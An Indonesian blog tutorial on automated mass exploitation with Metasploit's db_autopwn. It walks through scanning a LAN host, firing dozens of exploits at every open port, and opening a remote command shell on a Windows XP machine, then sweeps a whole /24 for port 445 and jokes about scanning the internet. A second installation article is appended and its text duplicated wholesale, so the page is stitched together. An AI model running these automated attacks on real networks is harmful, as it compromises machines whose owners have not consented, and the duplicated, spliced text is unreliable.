Artikel ini merupakan lanjutan dari artikel sebelumnya yaitu Metasploit I : Teknik Dasar. Dalam artikel yang kedua ini saya ingin membahas mengenai penggunaan metasploit untuk mass exploitation dengan menggunakan db_autopwn.
Sebelumnya pastikan instalasi metasploit kita sudah terintegrasi terlebih dahulu dengan database (bisa menggunakan MySQL, postgre, ataupun SQLite3) dan nmap. Prosedur instalasinya silahkan anda lihat disini.
Metode mass exploitation pertama yang akan saya gunakan dalam artikel ini menggunakan teknik mass exploit pada satu mesin dengan memanfaatkan vulnerability di seluruh layanan server/port yang terbuka, atau kita istilahkan pendekatan secara vertikal (istilah ini ndak akan ketemu kalo mbuka-mbuka kamus eksploitasi sistem, lha wong istilahnya made in indo hahaha.. ). Model pendekatan yang lain juga akan dicoba (secara singkat) di bawah artikel ini.
Metode mass exploit secara vertikal
Ya dah langsung kita coba aja ke satu mesin yang sudah kita siapkan sebelumnya.
- Jalankan metasploit console dari shell :
$ sudo msfconsole
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ msf v3.3-dev
+ -- --=[ 359 exploits - 233 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 132 aux
- Jalankan plugin mysql terlebih dahulu (saya menggunakan mysql database)
msf > load db_mysql
[*] Successfully loaded plugin: db_mysql
- Sambungkan metasploit dengan database di MySQL
msf > db_connect msf:msf@localhost/metasploit
msf >
- Scan mesin target menggunakan nmap untuk melihat port yang terbuka.
Hasil scan ini akan tersimpan otomatis kedalam database yang telah disiapkan sebelumnya.
msf > db_nmap -v -sS 192.168.1.10
[*] exec: "/usr/bin/nmap" "-v" "-sS" "192.168.1.10" "-oX" "/tmp/dbnmap20090404-13424-19l1thf-0"
NMAP:
NMAP: Starting Nmap 4.62 ( http://nmap.org ) at 2009-04-04 17:35 CIT
NMAP: Initiating ARP Ping Scan at 17:35
NMAP: Scanning 192.168.1.10 [1 port]
NMAP: Completed ARP Ping Scan at 17:35, 0.00s elapsed (1 total hosts)
NMAP: Initiating Parallel DNS resolution of 1 host. at 17:35
NMAP: Completed Parallel DNS resolution of 1 host. at 17:35, 0.00s elapsed
NMAP: Initiating SYN Stealth Scan at 17:35
NMAP: Scanning 192.168.1.10 [1715 ports]
NMAP: Discovered open port 1723/tcp on 192.168.1.10
NMAP: Discovered open port 3389/tcp on 192.168.1.10
NMAP: Discovered open port 139/tcp on 192.168.1.10
NMAP: Discovered open port 1025/tcp on 192.168.1.10
NMAP: Discovered open port 1026/tcp on 192.168.1.10
NMAP: Discovered open port 445/tcp on 192.168.1.10
NMAP: Discovered open port 1043/tcp on 192.168.1.10
NMAP: Discovered open port 12345/tcp on 192.168.1.10
NMAP: Discovered open port 1521/tcp on 192.168.1.10
NMAP: Discovered open port 135/tcp on 192.168.1.10
NMAP: Discovered open port 3372/tcp on 192.168.1.10
NMAP: Discovered open port 1433/tcp on 192.168.1.10
NMAP: Completed SYN Stealth Scan at 17:35, 0.67s elapsed (1715 total ports)
NMAP: Host 192.168.1.10 appears to be up ... good.
NMAP: Interesting ports on 192.168.1.10:
NMAP: Not shown: 1703 closed ports
NMAP: PORT STATE SERVICE
NMAP: 135/tcp open msrpc
NMAP: 139/tcp open netbios-ssn
NMAP: 445/tcp open microsoft-ds
NMAP: 1025/tcp open NFS-or-IIS
NMAP: 1026/tcp open LSA-or-nterm
NMAP: 1043/tcp open boinc
NMAP: 1433/tcp open ms-sql-s
NMAP: 1521/tcp open oracle
NMAP: 1723/tcp open pptp
NMAP: 3372/tcp open msdtc
NMAP: 3389/tcp open ms-term-serv
NMAP: 12345/tcp open netbus
NMAP: MAC Address: 00:1C:C0:50:B9:00 (Intel Corporate)
NMAP:
NMAP: Read data files from: /usr/share/nmap
NMAP: Nmap done: 1 IP address (1 host up) scanned in 0.872 seconds
NMAP: Raw packets sent: 1716 (75.502KB) | Rcvd: 1716 (78.932KB)
msf >
- Untuk mengetahui opsi-opsi db_autopwn, bisa dilihat terlebih dahulu dari menu help-nya. Silahkan anda coba dan pelajari opsi-opsi tersebut dengan berbagai kombinasi yang anda inginkan
msf > db_autopwn -h
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port
-q Disbale exploit module output
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
msf >
- db_autopwn akan kita jalankan menggunakan modul-modul exploit yang sesuai dengan port-port yang sebelumnya telah tersimpan di database
msf > db_autopwn -p -t
[*] Analysis completed in 6.07385802268982 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_exec against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[*] Matched auxiliary/admin/db2/db2rcmd against 192.168.1.10:445...
[*] Matched auxiliary/scanner/mssql/mssql_login against 192.168.1.10:1433...
[*] Matched auxiliary/dos/windows/smb/ms06_063_trans against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 192.168.1.10:445...
[*] Matched auxiliary/scanner/smb/login against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rras against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_addprivs_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/psexec against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[*] Matched exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] Matched auxiliary/dos/windows/smb/vista_negotiate_stop against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms09_001_write against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[*] Matched exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[*] Matched exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[*] Matched exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] Matched auxiliary/scanner/dcerpc/management against 192.168.1.10:135...
[*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against 192.168.1.10:135...
[*] Matched exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[*] Matched exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[*] Matched exploit/linux/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_sql against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms04_007_killbill against 192.168.1.10:445...
msf >
- Lakukan exploitasi system dengan menambahkan opsi -e :
msf > db_autopwn -p -t -e
[*] Analysis completed in 6.27089881896973 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_exec against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[*] (3/39): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched auxiliary/admin/db2/db2rcmd against 192.168.1.10:445...
[*] Matched auxiliary/scanner/mssql/mssql_login against 192.168.1.10:1433...
[*] Matched auxiliary/dos/windows/smb/ms06_063_trans against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 192.168.1.10:445...
[*] Matched auxiliary/scanner/smb/login against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_025_rras against 192.168.1.10:445...
[*] Matched auxiliary/dos/samba/lsa_addprivs_heap against 192.168.1.10:445...
[*] Matched exploit/windows/smb/psexec against 192.168.1.10:445...
[*] (13/39): Launching exploit/windows/smb/psexec against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] (14/39): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.10:445...
[*] Started bind handler
[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Connecting to the server...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[*] Authenticating as user 'Administrator'...
[*] (15/39): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[*] (16/39): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[-] Exploit failed: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
[*] Matched exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[*] (17/39): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[*] (18/39): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.1.10:135...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] (19/39): Launching exploit/solaris/samba/lsa_transnames_heap against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] (20/39): Launching exploit/multi/samba/nttrans against 192.168.1.10:139...
[*] Matched auxiliary/dos/windows/smb/vista_negotiate_stop against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms09_001_write against 192.168.1.10:445...
[*] Matched exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[*] (23/39): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[*] (24/39): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[*] (25/39): Launching exploit/windows/smb/msdns_zonename against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[*] (26/39): Launching exploit/linux/pptp/poptop_negative_read against 192.168.1.10:1723...
[-] Exploit failed: wrong number of arguments (1 for 0)
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[*] (27/39): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] (28/39): Launching exploit/solaris/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/trans2open against 192.168.1.10:139...
[*] Matched exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] (30/39): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.10[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.10[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Server appears to have been patched
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.6:46451 -> 192.168.1.10:29595)
[*] Matched exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] (31/39): Launching exploit/netware/smb/lsass_cifs against 192.168.1.10:445...
[*] Matched auxiliary/scanner/dcerpc/management against 192.168.1.10:135...
[*] Matched auxiliary/scanner/dcerpc/endpoint_mapper against 192.168.1.10:135...
[*] Matched exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[*] (34/39): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.10:445...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[*] (35/39): Launching exploit/windows/mssql/ms02_056_hello against 192.168.1.10:1433...
[-] Exploit failed: Anonymous modules have no name to be referenced by
[*] Matched exploit/linux/samba/lsa_transnames_heap against 192.168.1.10:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.1.10:445...
[*] Matched auxiliary/admin/mssql/mssql_sql against 192.168.1.10:1433...
[*] Matched exploit/windows/smb/ms04_007_killbill against 192.168.1.10:445...
msf >
- Eksploitasi telah selesai. Periksa session yang aktif dengan menuliskan perintah session -l. Apabila ada message no active session berarti eksploitasi yang kita lakukan gagal.
msf > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.1.6:46451 -> 192.168.1.10:29595
- Dari message diatas diketahui eksploitasi telah berhasil dilakukan dan ada 1 sesi yang aktif, yaitu session dengan id 1. Untuk berinteraksi dengan session yang aktif :
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.254
C:\WINDOWS\system32>
Owned… !!
Metode mass exploit secara horisontal / linier
Sebenarnya cara yang dipakai dalam metode ini sama dengan metode sebelumnya, yang membedakan adalah model pencarian port yang terbuka. Cara ini lebih fokus kepada pencarian kelemahan sistem pada port tertentu dalam suatu network. Jadi yang pegang peranan dalam pemilihan metode ini sebenarnya adalah pada kustomisasi command di nmap. Contoh paling mudah yaitu memanfaatkan exploit MS Windows MS08-067 seperti artikel terdahulu. Test case kali ini memanfaatkan exploit tersebut di dalam network lokal saya : 192.168.1.0/24.
Silahkan anda ikuti saja tutorial seperti metode yang diatas hanya saja command pencarian port yang terbuka diubah menjadi :
msf > nmap -sS -p 445 -n -T Aggressive 192.168.1.0/24
[*] exec: nmap -sS -p 445 -n -T Aggressive 192.168.1.0/24
Starting Nmap 4.62 ( http://nmap.org ) at 2009-04-05 17:06 CIT
Interesting ports on 192.168.1.6:
PORT STATE SERVICE
445/tcp closed microsoft-ds
Interesting ports on 192.168.1.10:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1C:C0:50:B9:00 (Intel Corporate)
Interesting ports on 192.168.1.12:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:11:2F:A6:03:9F (Asustek Computer)
Interesting ports on 192.168.1.20:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1E:8C:CC:07:2A (Asustek Computer)
Interesting ports on 192.168.1.26:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:04:23:6E:EC:AD (Intel)
Interesting ports on 192.168.1.28:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
Interesting ports on 192.168.1.30:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1E:EC:79:94:F7 (Compal Information (kunshan) CO.)
Interesting ports on 192.168.1.103:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:18:DE:07:3D:91 (Intel)
Interesting ports on 192.168.1.254:
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:1D:7E:27:BA:E6 (Cisco-Linksys)
Nmap done: 256 IP addresses (9 hosts up) scanned in 2.566 seconds
msf >
Apabila anda masih mengalami kesulitan dalam menerapkan metode ini, silahkan anda baca artikel yang juga sudah lengkap dengan step by step-nya dari blog temen-temen kecoak disini atau blognya pakde HDM disini.
Nah… sekarang coba anda bayangkan, gimana kalo kedua metode tersebut digabung? Dalam artian melakukan scaning ke SEMUA port terbuka dalam suatu network? Atau malah scanning ke network berkelas A.. Silahkan anda bayangkan sendiri.. :D
Kalo bayangan saya ya kompi anda pasti hang apalagi kalo resource hardwarenya pas-pasan kaya saya ini hehehe.. Atau malah lebih sadis lagi kalo anda gunakan untuk scanning di internet bisa-bisa diblokir ma ISP-nya haha….
Sebenarnya teknik-teknik ini kurang bagus, karena eksploitasi yang dilakukan tergolong ngawor, karena dengan hanya ber-ASUMSI pada port terbuka, maka db_autopwn akan menjalankan SEMUA modul yang ada dengan spesifikasi port tersebut, ndak peduli modul yang dipanggil relevan apa tidak dengan vulner/sistem yang terkait.
Supaya eksploitasi sistem lebih fokus dan terarah dapat juga menggunakan tools nessus, karena kita dapat memanfaatkan cross referencing mode (opsi -x) di db_autopwn. Artikelnya nyusul yah, karena laptop ini belum ada nessusnya. Abis fresh install :D
Seperti biasa, use this article wisely. Saya ndak akan nulis artikel ini utk tujuan pendidikan semata, penulis tidak bertanggung jawab bla..bla..bla.. Tapi saya lebih suka menggugah kesadaran anda saja.
WARNING!!!!!! INI HANYA UNTUK PEMBELAJARAN SEMATA, MOHON JANGAN DISALAH GUNAKAN!!!
Metasploit Auto Exploit
Sejak Metasploit Framework versi 3 dirilis pada awal tahun 2007, H.D Moore (pembuat Metasploit) melakukan perubahan besar-besaran di tubuh Metasploit versi 3 tersebut. Dengan mengintegrasikannya ke pemrograman Ruby, dengan jelas terlihat bahwa H.D Moore hendak menjadikan Metasploit sebagai framework tool yang tidak bisa dipandang sebelah mata lagi, dan patut disejajarkan dengan tool-tool pentest lainnya yang telah lebih dulu dianggap professional. Apalagi dengan modul tambahan yang powerful, db_autopwn, sebuah modul yang memungkinkan sebuah auto exploiting system.
Modul db_autopwn diperkenalkan pertama kali pada sistem operasi Linux Backtrack 2, dengan alasan bahwa program tersebut cocoknya berada pada sistem operasi yang berbau auditing/pentest.
Pada kesempatan kali ini, saya ingin menunjukkan cara menjalankan modul db_autopwn pada distro Linux selain Backtrack 2, yaitu Linux Mint 4.0 (Daryna). Yang saya lakukan adalah sebagai berikut:
1.Menyiapkan direktori untuk keperluan download.
tom@m1abrams:~$ sudo mkdir /pentest/
tom@m1abrams:~$ sudo chown tom:admin /pentest/
tom@m1abrams:~$ cd /pentest
2. Install Subversion
tom@m1abrams:/pentest$ sudo apt-get install subversion
3. Install Metasploit dari SVN
tom@m1abrams:/pentest$ svn co http://metasploit.com/svn/framework3/trunk/
4. Install Ruby dan semua paket yang berhubungan.
tom@m1abrams:/pentest$ sudo apt-get install ruby libruby rdoc libyaml-ruby libzlib-ruby libopenssl-ruby libdl-ruby libreadline-ruby libiconv-ruby rubygems
5.Install Ruby on Rails (jawab ‘Y’ untuk semuanya)
tom@m1abrams:/pentest$ gem install -v=1.2.3 rails
6. Install libgtk2-ruby, libglade2-ruby, sqlite3, dst..
tom@m1abrams:/pentest$ sudo apt-get install libgtk2-ruby libglade2-ruby sqlite3 libsqlite3-ruby1.8 libdbd-sqlite3-ruby1.8
7. Install Nmap
tom@m1abrams:/pentest$ sudo apt-get install nmap
Ok ! Sampai disini, persiapan selesai. Apabila kita melihat isi dari direktori tempat metasploit yang kita download dari SVN, direktorinya bernama trunk, lebih mudah apabila kita menggantinya jadi msf3.
tom@m1abrams:/pentest$ ls
trunk
tom@m1abrams:/pentest$ mv trunk msf3
tom@m1abrams:/pentest$ ls
msf3
tom@m1abrams:/pentest$
8. Silakan masuk ke direktori msf3.
tom@m1abrams:/pentest$ cd msf3
tom@m1abrams:/pentest/msf3$ ls
data lib msfconsole msfgui msfpescan README
documentation modules msfd msfopcode msfweb scripts
external msfcli msfencode msfpayload plugins tools
tom@m1abrams:/pentest/msf3$
9. Jalankan msfconsole..
tom@m1abrams:/pentest/msf3$ ./msfconsole
=[ msf v3.1-dev
+ -- --=[ 259 exploits - 116 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 44 aux
msf >
10. Load modul SQLite3 yang telah kita install dan membuat database pentest
msf > load db_sqlite3
msf > db_create pentest
11. Untuk melihat perintah-perintah yang tersedia, ada pada menu help
Database Backend Commands
=========================
Command Description
------- -----------
db_add_host Add one or more hosts to the database
db_add_port Add a port to host
db_autopwn Automatically exploit everything
db_hosts List all hosts in the database
db_import_nessus_nbe Import a Nessus scan result file (NBE)
db_import_nmap_xml Import a Nmap scan results file (-oX)
db_nmap Executes nmap and records the output automatically
db_services List all services in the database
db_vulns List all vulnerabilities in the database
SQLite3 Database Commands
=========================
Command Description
------- -----------
db_connect Connect to an existing database ( /path/to/db )
db_create Create a brand new database ( /path/to/db )
db_destroy Drop an existing database ( /path/to/db )
db_disconnect Disconnect from the current database instance
12. Jalankan db_autopwn untuk melihat menu helpnya.
msf> db_autopwn
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-s Only obtain a single shell per target system (NON-FUNCTIONAL)
-r Use a reverse connect shell
-b Use a bind shell on a random port
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
13. Testing pada jaringan lokal..
Saya menjalankan perintah db_nmap [network]
msf > db_nmap 192.168.10.*
Starting Nmap 4.20 ( http://insecure.org ) at 2007-12-23 17:57 WIT
Interesting ports on 192.168.10.1:
Not shown: 1693 closed ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Interesting ports on 192.168.10.5:
Not shown: 1696 closed ports
PORT STATE SERVICE
22/tcp open ssh
Interesting ports on 192.168.10.9:
Not shown: 1691 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
3389/tcp open ms-term-serv
5000/tcp open UPnP
Nmap finished: 256 IP addresses (3 hosts up) scanned in 3.147 seconds
msf >
Terlihat bahwa pada jaringan lokal tersebut, terdapat 3 host yang ditemukan oleh db_nmap. Hasil scanning tersebut dimasukkan dalam tabel-tabel yang telah dibuat oleh db_sqlite3.
14. Melihat service yang ditemukan oleh db_nmap.
msf > db_services
[*] Service: host=192.168.10.1 port=139 proto=tcp state=up name=netbios-ssn
[*] Service: host=192.168.10.1 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.10.5 port=22 proto=tcp state=up name=ssh
[*] Service: host=192.168.10.9 port=135 proto=tcp state=up name=msrpc
[*] Service: host=192.168.10.9 port=139 proto=tcp state=up name=netbios-ssn
[*] Service: host=192.168.10.9 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.10.9 port=1025 proto=tcp state=up name=NFS-or-IIS
[*] Service: host=192.168.10.9 port=3389 proto=tcp state=up name=ms-term-serv
[*] Service: host=192.168.10.9 port=5000 proto=tcp state=up name=UPnP
msf >
Program db_autopwn dibuat secara mengagumkan dengan memanfaatkan database, sehingga melancarkan serangan otomatis bukanlah mustahil.
Referensi:
Metasploit 3.0 – Automated Exploitation
Modul db_autopwn diperkenalkan pertama kali pada sistem operasi Linux Backtrack 2, dengan alasan bahwa program tersebut cocoknya berada pada sistem operasi yang berbau auditing/pentest.
Pada kesempatan kali ini, saya ingin menunjukkan cara menjalankan modul db_autopwn pada distro Linux selain Backtrack 2, yaitu Linux Mint 4.0 (Daryna). Yang saya lakukan adalah sebagai berikut:
1.Menyiapkan direktori untuk keperluan download.
tom@m1abrams:~$ sudo mkdir /pentest/
tom@m1abrams:~$ sudo chown tom:admin /pentest/
tom@m1abrams:~$ cd /pentest
2. Install Subversion
tom@m1abrams:/pentest$ sudo apt-get install subversion
3. Install Metasploit dari SVN
tom@m1abrams:/pentest$ svn co http://metasploit.com/svn/framework3/trunk/
4. Install Ruby dan semua paket yang berhubungan.
tom@m1abrams:/pentest$ sudo apt-get install ruby libruby rdoc libyaml-ruby libzlib-ruby libopenssl-ruby libdl-ruby libreadline-ruby libiconv-ruby rubygems
5.Install Ruby on Rails (jawab ‘Y’ untuk semuanya)
tom@m1abrams:/pentest$ gem install -v=1.2.3 rails
6. Install libgtk2-ruby, libglade2-ruby, sqlite3, dst..
tom@m1abrams:/pentest$ sudo apt-get install libgtk2-ruby libglade2-ruby sqlite3 libsqlite3-ruby1.8 libdbd-sqlite3-ruby1.8
7. Install Nmap
tom@m1abrams:/pentest$ sudo apt-get install nmap
Ok ! Sampai disini, persiapan selesai. Apabila kita melihat isi dari direktori tempat metasploit yang kita download dari SVN, direktorinya bernama trunk, lebih mudah apabila kita menggantinya jadi msf3.
tom@m1abrams:/pentest$ ls
trunk
tom@m1abrams:/pentest$ mv trunk msf3
tom@m1abrams:/pentest$ ls
msf3
tom@m1abrams:/pentest$
8. Silakan masuk ke direktori msf3.
tom@m1abrams:/pentest$ cd msf3
tom@m1abrams:/pentest/msf3$ ls
data lib msfconsole msfgui msfpescan README
documentation modules msfd msfopcode msfweb scripts
external msfcli msfencode msfpayload plugins tools
tom@m1abrams:/pentest/msf3$
9. Jalankan msfconsole..
tom@m1abrams:/pentest/msf3$ ./msfconsole
=[ msf v3.1-dev
+ -- --=[ 259 exploits - 116 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 44 aux
msf >
10. Load modul SQLite3 yang telah kita install dan membuat database pentest
msf > load db_sqlite3
msf > db_create pentest
11. Untuk melihat perintah-perintah yang tersedia, ada pada menu help
Database Backend Commands
=========================
Command Description
------- -----------
db_add_host Add one or more hosts to the database
db_add_port Add a port to host
db_autopwn Automatically exploit everything
db_hosts List all hosts in the database
db_import_nessus_nbe Import a Nessus scan result file (NBE)
db_import_nmap_xml Import a Nmap scan results file (-oX)
db_nmap Executes nmap and records the output automatically
db_services List all services in the database
db_vulns List all vulnerabilities in the database
SQLite3 Database Commands
=========================
Command Description
------- -----------
db_connect Connect to an existing database ( /path/to/db )
db_create Create a brand new database ( /path/to/db )
db_destroy Drop an existing database ( /path/to/db )
db_disconnect Disconnect from the current database instance
12. Jalankan db_autopwn untuk melihat menu helpnya.
msf> db_autopwn
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-s Only obtain a single shell per target system (NON-FUNCTIONAL)
-r Use a reverse connect shell
-b Use a bind shell on a random port
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
13. Testing pada jaringan lokal..
Saya menjalankan perintah db_nmap [network]
msf > db_nmap 192.168.10.*
Starting Nmap 4.20 ( http://insecure.org ) at 2007-12-23 17:57 WIT
Interesting ports on 192.168.10.1:
Not shown: 1693 closed ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Interesting ports on 192.168.10.5:
Not shown: 1696 closed ports
PORT STATE SERVICE
22/tcp open ssh
Interesting ports on 192.168.10.9:
Not shown: 1691 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
3389/tcp open ms-term-serv
5000/tcp open UPnP
Nmap finished: 256 IP addresses (3 hosts up) scanned in 3.147 seconds
msf >
Terlihat bahwa pada jaringan lokal tersebut, terdapat 3 host yang ditemukan oleh db_nmap. Hasil scanning tersebut dimasukkan dalam tabel-tabel yang telah dibuat oleh db_sqlite3.
14. Melihat service yang ditemukan oleh db_nmap.
msf > db_services
[*] Service: host=192.168.10.1 port=139 proto=tcp state=up name=netbios-ssn
[*] Service: host=192.168.10.1 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.10.5 port=22 proto=tcp state=up name=ssh
[*] Service: host=192.168.10.9 port=135 proto=tcp state=up name=msrpc
[*] Service: host=192.168.10.9 port=139 proto=tcp state=up name=netbios-ssn
[*] Service: host=192.168.10.9 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.10.9 port=1025 proto=tcp state=up name=NFS-or-IIS
[*] Service: host=192.168.10.9 port=3389 proto=tcp state=up name=ms-term-serv
[*] Service: host=192.168.10.9 port=5000 proto=tcp state=up name=UPnP
msf >
Program db_autopwn dibuat secara mengagumkan dengan memanfaatkan database, sehingga melancarkan serangan otomatis bukanlah mustahil.
Referensi:
